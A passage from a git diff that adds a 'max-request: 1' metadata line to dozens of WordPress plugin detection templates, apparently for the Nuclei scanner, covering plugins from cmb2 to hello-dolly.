--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
